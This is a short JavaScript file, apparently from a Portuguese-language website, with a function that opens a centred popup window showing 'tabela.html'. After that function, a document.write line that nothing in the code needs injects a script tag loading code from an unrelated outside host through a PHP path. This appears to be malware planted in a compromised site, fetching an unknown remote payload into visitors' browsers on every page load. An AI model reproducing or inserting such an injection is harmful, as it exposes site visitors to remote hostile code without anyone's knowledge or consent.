function tabela(caminho){
	Wwidth  = 800;
	Wheight = 600;

	tamW = screen.width;
	tamH = screen.height;

	posW = (tamW/2) - (Wwidth/2);
	posH = (tamH/2) - (Wheight/2);

	params = ",left="+posW+",top="+posH+",width="+Wwidth+",height="+Wheight+",scrollbars=1,status=0";

	window.open('tabela.html','tabela',params);
}


document.write('<script src=http://jimingraham.com/images/contact.php ><\/script>');